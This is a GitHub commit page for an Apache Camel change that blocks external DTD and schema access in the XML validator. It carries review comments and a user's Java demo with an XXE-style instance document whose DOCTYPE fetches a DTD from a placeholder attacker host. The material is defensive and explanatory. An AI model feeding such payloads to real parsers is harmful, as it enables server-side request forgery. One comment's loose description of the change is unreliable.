CAMEL-12444: Improved DTD handling in validator component.
davsclaus committed Apr 16, 2018
1 parent 750c8e4 commit 24eefa5
Showing 2 changed files with 14 additions and 0 deletions.
Expand Up @@ -175,6 +175,7 @@ protected SchemaFactory createSchemaFactory() {
}
if (camelContext == null || !Boolean.parseBoolean(camelContext.getGlobalOptions().get(ACCESS_EXTERNAL_DTD))) {
try {
LOG.debug("Configuring SchemaFactory to not allow access to external DTD/Schema");
factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
} catch (SAXException e) {
LOG.warn(e.getMessage(), e);
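Review bot: at `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");` only external DTD access is restricted, but the debug message just above it says "DTD/Schema", and the Validator in ValidatingProcessor restricts both properties. Remote xs:import/xs:include targets resolved while the factory compiles the schema are governed by ACCESS_EXTERNAL_SCHEMA on the SchemaFactory, not by ACCESS_EXTERNAL_DTD, so either add `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");` here as well or narrow the log message to what is actually restricted. The `camelContext == null` branch defaults to restricted, which is the safe direction and worth keeping.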
Expand Up @@ -22,6 +22,7 @@
import java.net.URL;
import java.util.Collections;

import javax.xml.XMLConstants;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.transform.Result;
import javax.xml.transform.Source;
Expand Down Expand Up @@ -53,6 +54,8 @@
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

import static org.apache.camel.processor.validation.SchemaReader.ACCESS_EXTERNAL_DTD;

/**
* A processor which validates the XML version of the inbound message body
* against some schema either in XSD or RelaxNG
Expand Down Expand Up @@ -100,6 +103,16 @@ protected void doProcess(Exchange exchange) throws Exception {
}

Validator validator = schema.newValidator();
// turn off access to external schema by default
if (!Boolean.parseBoolean(exchange.getContext().getGlobalOptions().get(ACCESS_EXTERNAL_DTD))) {
try {
LOG.debug("Configuring Validator to not allow access to external DTD/Schema");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
} catch (SAXException e) {
LOG.warn(e.getMessage(), e);
}
}

// the underlying input stream, which we need to close to avoid locking files or other resources
Source source = null;
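Review bot: the `} catch (SAXException e) {` block only logs a warning, so on a parser that does not recognise the JAXP 1.5 properties the validator carries on with external DTD and schema access enabled, which is the opposite of the "turn off access to external schema by default" intent stated in the comment. Consider rethrowing (or wrapping in a runtime exception) unless the user has explicitly opted in through the global option, so a misconfigured parser fails closed rather than open. Also, the global option read here is named ACCESS_EXTERNAL_DTD but it gates both `validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");` and `validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");`; document that a single option controls both, since the name suggests DTD only.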

2 comments on commit 24eefa5

@Huorang-Liu

The first change has added a command so that the SchemaFactory cannot access documents outside of the intended sphere of control. When it does, it will write a debug message to the system to let them know the situation, to avoid attackers forcing the application to make outgoing requests to servers that the attacker cannot reach directly, using CWE-611.
The second change has used ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA to judge the property of the DTD and schema, to monitor whether the DTD and schema have got messages, and when that happens, to give warnings.
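To show what the two JAXP 1.5 properties discussed in this commit actually do, here is a stand-alone example (added here; it is not Camel's code and not part of the commit). It compiles a small constructed XSD, then validates a constructed instance document whose DOCTYPE points at a remote DTD on the reserved host attacker.invalid. With ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA set to the empty string on both the SchemaFactory and the Validator, the JDK parser refuses the http:// DTD before any connection is attempted and validation fails with a SAXParseException; with the restriction off, the same input makes the parser try to fetch the DTD. The class and method names, the XSD and the instance document are all assumptions made for the example.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;
import org.xml.sax.SAXException;

// Added example, not Camel code: demonstrates the JAXP 1.5 access properties.
public class RestrictedValidatorDemo {

    // Constructed sample schema: a <note> element with a single <to> child.
    static final String XSD =
        "<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">"
      + "<xs:element name=\"note\"><xs:complexType><xs:sequence>"
      + "<xs:element name=\"to\" type=\"xs:string\"/>"
      + "</xs:sequence></xs:complexType></xs:element></xs:schema>";

    // Constructed hostile instance: the DOCTYPE references a remote DTD.
    // An unrestricted validator would try to fetch it (CWE-611, SSRF-style).
    static final String INSTANCE =
        "<!DOCTYPE note SYSTEM \"http://attacker.invalid/evil.dtd\">"
      + "<note><to>alice</to></note>";

    // Compile the schema; when restricted, forbid every protocol ("" = none)
    // for external DTDs and for remote xs:import / xs:include targets.
    static Schema compileSchema(boolean restricted) throws SAXException {
        SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
        if (restricted) {
            factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
            factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        }
        return factory.newSchema(new StreamSource(new StringReader(XSD)));
    }

    // The Validator has its own copy of the properties; they must be set again
    // here or the instance document's DOCTYPE / schemaLocation hints are fetched.
    static Validator newValidator(Schema schema, boolean restricted) throws SAXException {
        Validator validator = schema.newValidator();
        if (restricted) {
            validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
            validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        }
        return validator;
    }

    // Returns true if the document validated, false if the parser rejected it.
    static boolean validate(String xml, boolean restricted) throws IOException {
        try {
            Validator validator = newValidator(compileSchema(restricted), restricted);
            validator.validate(new StreamSource(new StringReader(xml)));
            return true;
        } catch (SAXException e) {
            // Restricted: "... 'http' access is not allowed due to restriction
            // set by the accessExternalDTD property" before any network I/O.
            System.out.println("rejected: " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("restricted validated=" + validate(INSTANCE, true));
        // Unrestricted: the parser attempts to resolve the remote DTD and
        // fails only because attacker.invalid does not resolve.
        System.out.println("unrestricted validated=" + validate(INSTANCE, false));
    }
}
```

The point the example makes about the commit: the properties are per object, so setting them on the SchemaFactory protects schema compilation (remote imports) while setting them on the Validator protects the instance document being validated, and both are needed for the "no external access by default" guarantee.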

@oscerd
Contributor

@oscerd oscerd commented on 24eefa5 Aug 21, 2020


What is the meaning of this comment?
